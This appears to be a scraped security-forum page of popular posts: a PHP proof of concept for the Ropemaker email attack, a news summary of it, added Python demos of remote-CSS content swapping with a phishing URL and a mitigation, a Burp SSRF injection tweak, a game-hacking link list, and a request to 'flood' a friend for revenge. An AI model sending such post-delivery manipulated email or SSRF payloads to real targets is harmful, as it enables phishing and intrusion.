
Leaderboard

Popular Content

Showing content with the highest reputation on 08/24/17 in all areas

  1. Scum. I hope he writhes in agony. @aelius - those people apparently aren't interested, burn the scumbag.
    4 points
  2. That's an arrow...
    3 points
  3. I played with ropemaker for the last few hours and I can say it's nothing special. POC:

```php
<?php
// Ropemaker PoC as posted: the body pulls its stylesheet from a remote host,
// so what the recipient sees can be changed after delivery by editing that CSS.
$to = "destinatar@site.tld";
$subject = "ropemaker vulnerability";
$message = <<<START
<html>
<head>
<style type="text/css">@import "http://link_catre_extern/style.css";</style>
</head>
<body>
I heard you are a <span id="content"></span> boy
</body>
</html>
START;
$headers  = "MIME-Version: 1.0\r\n";
$headers .= "Content-Transfer-Encoding: quoted-printable\r\n";
$headers .= "Content-Type: text/html; charset=UTF-8\r\n";
// The header declares quoted-printable, so the body is encoded to match it.
mail($to, $subject, quoted_printable_encode($message), $headers);
```

     In the CSS file we have this:

```css
#content:after { content:"good"; }
```

     After sending the email, the CSS file can be modified to add something else (e.g. bad). In my view, the vulnerability is only a problem on the side of the programmers who built the applications and don't know to ban importing CSS files from external sources. There are very few applications that don't block stylesheets (the vulnerability only worked for me on Outlook on Android), so in a month or two we should have security updates for them and ropemaker should be a thing of the past.
    2 points
  4. My little sister's phone got stolen/lost a week ago. Yesterday, I got a strange text. Today, I peaked!
     My little sister, who is going to be a senior, worked hard all summer to buy an iPhone, only to have it stolen (or fall out, she is still not entirely sure) out of her boyfriend's car a week ago. She had not activated the Find My iPhone app, so we reported it stolen but were pretty sure someone was just being gifted a free iPhone courtesy of my sister's summer wages. On top of that, she had also bought a wallet case and lost all her IDs and cards as well.
     So yesterday I get this text from a strange number. I give my sister a quick call to make sure it is not her and effectively realize someone is fishing through her contacts or documents to get her password. I am well aware after the WTH that this is not my sister, BTW. I was bored, so I say to myself, why not have some fun. We will never get the phone back, but what the heck, might as well kill some time.
     I am certain that his or her insistence will at the very least make this a lengthy exchange. I'm convinced this person is humoring me and just stringing me along until I cave. No one can be buying this! .... Again, I am thinking he is humoring me, but I was like, let's see how long this lasts until he stops texting me back. AVERY FTW!!!! My sister got an email this morning. I have peaked! Behold!
     Source: https://imgur.com/r/funny/USjnb
     I don't know if it's real, but the idea is interesting.
    1 point
  5. The Ultimate Online Game Hacking Resource
     A curated list of tutorials/resources for hacking online games! From dissecting game clients to cracking network packet encryption, this is a go-to reference for those interested in the topic of hacking online games. I'll be updating this list whenever I run across excellent resources, so be sure to Watch/Star it! If you know of an excellent resource that isn't yet on the list, feel free to email it to me for consideration.
     Blog Posts, Articles, and Presentations
     - KeyIdentity's Pwn Adventure 3 Blog Series: A series of blog posts detailing various approaches to hacking Pwn Adventure 3.
     - How to Hack an MMO: An article from 2014 providing general insight into hacking an online game.
     - Reverse Engineering Online Games - Dragomon Hunter: An in-depth tutorial showing how to reverse engineer online games via the game Dragomon Hunter.
     - Hacking/Exploiting/Cheating in Online Games (PDF): A presentation from 2013 that delves deeply into hacking online games, from defining terminology to providing code examples of specific hacks.
     - Hacking Online Games: A presentation from 2012 discussing various aspects of hacking online games.
     - For 20 Years, This Man Has Survived Entirely by Hacking Online Games: A hacker says he turned finding and exploiting flaws in popular MMO video games into a lucrative, full-time job.
     - Hackers in Multiplayer Games: A Reddit post discussing hacking in multiplayer games.
     - Reverse Engineering Network Protocols: A very helpful comment from a Reddit post inquiring about reversing network protocols.
     - Deciphering MMORPG Protocol Encoding: An informative discussion from a question on Stack Overflow.
     - Reverse Engineering of a Packet Encryption Function of a Game: An informative discussion from a question on StackExchange.
     Videos
     - How to Hack Local Values in Browser-Based Games with Cheat Engine: This video teaches you how to find and change local values (which might appear as server-based values) in browser-based games.
     - Reverse-Engineering a Proprietary Game Server with Erlang: This talk details advantages Erlang has over other languages for reverse engineering protocols and analyzing client files. A live demo showcasing some of these tools and techniques is also given.
     - DEFCON 19: Hacking MMORPGs for Fun and Mostly Profit: This talk presents a pragmatic view of both threats and defenses relating to hacking online games.
     Books
     - Game Hacking: Game Hacking shows programmers how to dissect computer games and create bots.
     - Attacking Network Protocols: Attacking Network Protocols is a deep-dive into network vulnerability discovery.
     - Practical Packet Analysis, 3rd Edition: Practical Packet Analysis, 3rd Ed. teaches you how to use Wireshark for packet capture and analysis.
     - Exploiting Online Games: Cheating Massively Distributed Systems: This book takes a close look at security problems associated with advanced, massively distributed software in relation to video games.
     Online Game Hacking Forums
     - Guided Hacking: Discussion of multiplayer and single-player game hacks and cheats.
     - UnKnoWnCheaTs Forum: Discussion of multiplayer game hacks and cheats.
     - MPGH (Multi-Player Game Hacking) Forum: Discussion of multiplayer game hacks and cheats.
     - ElitePVPers: Discussion of MMO hacks, bots, cheats, guides and more.
     - OwnedCore: An MMO gaming community for guides, exploits, trading, hacks, model editing, emulation servers, programs, bots and more.
     Source: https://github.com/dsasmblr/hacking-online-games/
    1 point
  6. Security researchers are warning of a new, easy-to-exploit email trick that could allow an attacker to turn a seemingly benign email into a malicious one after it has already been delivered to your email inbox. Dubbed Ropemaker (stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky), the trick was uncovered by Francisco Ribeiro, a researcher at email and cloud security firm Mimecast.
     A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with a malicious one. This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient's computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks.
     Ropemaker abuses Cascading Style Sheets (CSS) and Hypertext Markup Language (HTML), which are fundamental parts of the way information is presented on the Internet. Since the CSS is stored remotely, researchers say an attacker can change the content of an email through remotely initiated changes to the desired 'style' of the email, which is then retrieved remotely and presented to the user, without the recipient, even a tech-savvy user, knowing about it.
     According to the researchers, the Ropemaker attack could be leveraged depending upon the creativity of the threat actors. For instance, attackers could replace a URL that originally directed the user to a legitimate website with a malicious one that sends the user to a compromised site designed to infect users with malware or steal sensitive info, such as their credentials and banking details. While some systems are designed to detect the URL switch, preventing users from opening the malicious link, other users could be left at risk.
     Another attack scenario, called the "Matrix Exploit" by Mimecast, is more sophisticated than the "Switch Exploit", and therefore much harder to detect and defend against. In a Matrix Exploit attack, attackers would write a matrix of text in an email and then use the remote CSS to selectively control what is displayed, allowing the attacker to display whatever they want, including adding malicious URLs into the body of the email. This attack is harder to defend against because the initial email received by the user does not display any URL, so most software systems will not flag the message as malicious.
     Although the security firm has not detected the Ropemaker attack in the wild, it believes that this doesn't mean for sure the attack is "not being used somewhere outside the view of Mimecast." According to the security firm, Ropemaker could be used by hackers to bypass most common security systems and trick even tech-savvy users into interacting with a malicious URL.
     To protect themselves from such attacks, users are recommended to rely on web-based email clients like Gmail, iCloud and Outlook, which aren't affected by Ropemaker-style CSS exploits, according to Mimecast. However, email clients like the desktop and mobile versions of Apple Mail, Microsoft Outlook, and Mozilla Thunderbird are all vulnerable to the Ropemaker attack.
     Via https://thehackernews.com/2017/08/change-email-content.html
    1 point
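The PoC in post 3 and the "Matrix Exploit" described in post 6 rely on the same mechanism: the delivered message already contains every candidate string, and a stylesheet fetched at render time decides which one the client shows. The block below, an added example that is not code from either post, from Mimecast or from The Hacker News, builds such a matrix message, shows the text a client would render under the stylesheet served at delivery and under the one the attacker swaps in later, and then applies the two controls a gateway or client needs: a check that lists every remote stylesheet a message would fetch, and the mitigation post 3 calls for, stripping those references so the message renders only from what was actually delivered and scanned. The attacker host, the billing hostnames and the sample message are constructed for the example; the renderer is a deliberately minimal stand-in that honours only the two CSS rule shapes the attack uses.

```python
"""Ropemaker-style post-delivery change through remote CSS, plus the check and
the mitigation. Added example; hosts and the sample message are constructed."""
import re

# Constructed "matrix" email: both candidate strings are in the body; the
# remote stylesheet (hypothetical attacker host) decides which one is shown.
MATRIX_EMAIL = """<html><head>
<style type="text/css">@import "http://attacker.example/style.css";</style>
</head><body>
<p>Your invoice is ready:
<span id="good">https://billing.example.com/inv/1</span>
<span id="bad">https://billing.example.com.evil-phish.test/inv/1</span></p>
<p>I heard you are a <span id="content"></span> boy</p>
</body></html>"""

# What style.css serves while the message passes the filters ...
CSS_AT_DELIVERY = '#bad { display:none } #content:after { content:"good"; }'
# ... and what the attacker swaps in afterwards. The stored email never changes.
CSS_AFTER_SWAP = '#good { display:none } #content:after { content:"bad"; }'

_HIDE_RE = re.compile(r'#([\w-]+)\s*\{[^}]*display\s*:\s*none[^}]*\}', re.I)
_AFTER_RE = re.compile(r'#([\w-]+):after\s*\{[^}]*content\s*:\s*"([^"]*)"[^}]*\}', re.I)
_SPAN_RE = re.compile(r'<span\s+id="([\w-]+)">(.*?)</span>', re.I | re.S)


def render(html, css):
    """Toy renderer covering the two rule shapes the attack relies on:
    '#id { display:none }' and '#id:after { content:"..." }'.
    Returns the text a user would actually see."""
    hidden = set(_HIDE_RE.findall(css))
    generated = dict(_AFTER_RE.findall(css))

    def span(m):
        ident, inner = m.group(1), m.group(2)
        return "" if ident in hidden else inner + generated.get(ident, "")

    body = _SPAN_RE.sub(span, html)
    body = re.sub(r"<style\b.*?</style>", "", body, flags=re.I | re.S)
    return " ".join(re.sub(r"<[^>]+>", " ", body).split())


_IMPORT_RE = re.compile(r'@import\s+(?:url\(\s*)?["\']?([^"\')\s;]+)', re.I)
_LINK_TAG_RE = re.compile(r"<link\b[^>]*>", re.I)
_ATTR_RE = re.compile(r'([\w-]+)\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s>]+))')


def _is_remote(url):
    return url.lower().startswith(("http://", "https://", "//"))


def _link_attrs(tag):
    return {k.lower(): dq or sq or bare for k, dq, sq, bare in _ATTR_RE.findall(tag)}


def remote_css_refs(html):
    """The check: every remote stylesheet the message would fetch at render time,
    from CSS @import statements and <link rel=stylesheet href=...> tags."""
    refs = {u for u in _IMPORT_RE.findall(html) if _is_remote(u)}
    for tag in _LINK_TAG_RE.findall(html):
        attrs = _link_attrs(tag)
        if "stylesheet" in attrs.get("rel", "").lower() and _is_remote(attrs.get("href", "")):
            refs.add(attrs["href"])
    return sorted(refs)


def strip_remote_css(html):
    """The mitigation post 3 asks for: drop remote stylesheet references so the
    message can only render from the content that was delivered and scanned."""
    html = re.sub(r'@import\s+(?:url\(\s*)?["\']?(?:https?:)?//[^;]*;?', "", html, flags=re.I)

    def drop_if_remote(m):
        attrs = _link_attrs(m.group(0))
        remote = "stylesheet" in attrs.get("rel", "").lower() and _is_remote(attrs.get("href", ""))
        return "" if remote else m.group(0)

    return _LINK_TAG_RE.sub(drop_if_remote, html)


if __name__ == "__main__":
    print("at delivery :", render(MATRIX_EMAIL, CSS_AT_DELIVERY))
    print("after swap  :", render(MATRIX_EMAIL, CSS_AFTER_SWAP))
    print("remote css  :", remote_css_refs(MATRIX_EMAIL))
    safe = strip_remote_css(MATRIX_EMAIL)
    # With the import gone the client has no CSS to apply, so every candidate
    # string is visible and any URL filter finally sees the phishing link too.
    print("stripped    :", remote_css_refs(safe), "->", render(safe, ""))
```

Note that after stripping, both URLs become visible: that is the point of the mitigation. A URL filter that only scans the rendered text at delivery sees the matrix as harmless, but one that scans the raw delivered HTML, or a client that refuses remote CSS, cannot be fooled by a later change to style.css.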
  7. Leveraging Duo Security’s Default Configuration to Bypass Two-Factor Authentication " Few things are more frustrating as an attacker than running up against widely implemented two-factor authentication (2FA). Even with valid credentials, without a valid two-factor authentication code or push acknowledgement, logging in to a protected service and abusing its capabilities or harvesting information isn’t possible. But what if instead of attacking the application, we first attacked how the two-factor authentication was implemented? In this blog post, we’ll discuss how one particular 2FA solution – by Duo Security – can have its default configuration leveraged to allow a log in without 2FA and how to mitigate against this tactic. " Source: https://appsecconsulting.com/blog/leveraging-duo-securitys-default-configuration-to-bypass-two-factor-authent
    1 point
  8. Adapting Burp Extensions for Tailored Pentesting
     Burp Suite is privileged to serve as a platform for numerous extensions developed and shared by our community of users. These expand Burp's capabilities in a range of intriguing ways. That said, many extensions were built to solve a very specific problem, and you might have ideas for how to adapt an extension to better fulfil your needs. Altering third-party Burp extensions used to be pretty difficult, but we've recently made sure all Burp extensions are open source and share a similar build process. In this post, I'll show you just how easy it's become to customize an extension and build a bespoke Burp environment for effective and efficient audits. I'll personalize the Collaborator Everywhere extension by making it inject extra query parameters that are frequently vulnerable to SSRF, as identified by Bugcrowd for their excellent HUNT extension.
     Development Environment Prerequisites
     First, create your development environment. To edit an extension written in Java, you'll need to install the Java JDK and Gradle. Extensions written in Python and Ruby don't have any equivalent requirements, but Git is always useful. This is all you'll need to build the majority of Burp extensions - Gradle will automatically handle any extension-specific dependencies for you. I'll use Windows because it's reliably the most awkward development environment.
     Obtain code
     The next step is to obtain the code you want to hack up. Find your target extension on https://portswigger.net/bappstore and click the 'View Source Code' button. This will land you on a GitHub page something like https://github.com/portswigger/collaborator-everywhere. To get the code, either click download to get a zip or open a terminal, type git clone https://github.com/portswigger/collaborator-everywhere, and cd into the new folder.
     Verify environment (Java only)
     Before you make any changes, ensure you can successfully build the jar and load it into Burp. To find out how to build the jar, look for the BuildCommand line in the BappManifest.bmf file. For Collaborator Everywhere, it's simply gradle fatJar. The EntryPoint line shows where the resulting jar will appear.
     Apply & test changes
     If you can load the freshly built jar into Burp and it works as expected, you're ready to make your changes and rebuild. Collaborator Everywhere reads its payloads from resources/injections, so I've simply added an extra line for each parameter I want to inject. For example, the following line adds a GET parameter called 'feed', formatted as an HTTP URL: param,feed,http://%s/
     If a particular payload is causing you grief, you can comment it out using a #. The extension Flow may come in useful for verifying your modifications work as expected - it shows requests made by all Burp components, including the scanner. Here, we can see our modified extension is working as intended:
     Finally, be aware that innocuous changes may have unexpected side effects.
     Conclusion
     If you feel like sharing your enhanced extension with the community, feel free to submit your changes back to the PortSwigger repository as a pull request, or release them as a fork. I haven't pushed my Collaborator Everywhere tweak into an official release because the extra parameters unfortunately upset quite a few websites. Some extensions may be more difficult to modify than others, but we've seen that with a little environment setup, you can modify Burp extensions with impunity. Enjoy - @albinowax
     Posted by James Kettle at 2:47 PM
     Source: http://blog.portswigger.net/2017/08/adapting-burp-extensions-for-tailored.html
    1 point
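To see what an injection line such as param,feed,http://%s/ actually does to a request, here is an added example that re-implements that one step outside Burp. It is not the extension's code: the line format kind,name,template, with %s standing in for the Collaborator host and # starting a comment, is inferred from the single line and the commenting tip in the post above and is an assumption, as are the sample target URL and the Collaborator host. Each 'param' line becomes an extra GET parameter carrying a URL on the Collaborator host, so a server that follows it (the SSRF case the post targets) generates a DNS or HTTP interaction Burp can attribute to that request.

```python
"""Apply Collaborator Everywhere-style injection lines to a request URL.
Added example, not the extension's own code; the line format and the
sample hosts are assumptions."""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed stand-in for resources/injections after the tweak described above.
INJECTIONS = """# kind,name,template -- %s is replaced with the Collaborator host
param,feed,http://%s/
param,u,http://%s/
#param,dest,http://%s/   commented out with '#', as the post describes
param,redirect_uri,http://%s/
"""


def parse_injections(text):
    """Return (kind, name, template) triples, skipping blank lines and '#' comments."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        kind, name, template = (part.strip() for part in line.split(",", 2))
        rows.append((kind, name, template))
    return rows


def inject_params(url, injections, collaborator_host):
    """Append each 'param' payload as a GET parameter pointing at the
    Collaborator host. A parameter the request already carries is left alone
    so the original functionality keeps working; even so, every added
    parameter is one more thing a strict backend may reject, which is the
    side effect the post warns about."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    present = {name for name, _ in query}
    for kind, name, template in injections:
        if kind != "param" or name in present:
            continue
        query.append((name, template % collaborator_host))
    return urlunsplit(parts._replace(query=urlencode(query)))


if __name__ == "__main__":
    payloads = parse_injections(INJECTIONS)
    print(inject_params("https://target.example/search?q=test&u=keep",
                        payloads, "abc123.burpcollaborator.net"))
```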
  9. Are you selling it with the leg and all?
    1 point
  10. Nytro, I want to flood a friend who annoyed me and I want proper revenge
    1 point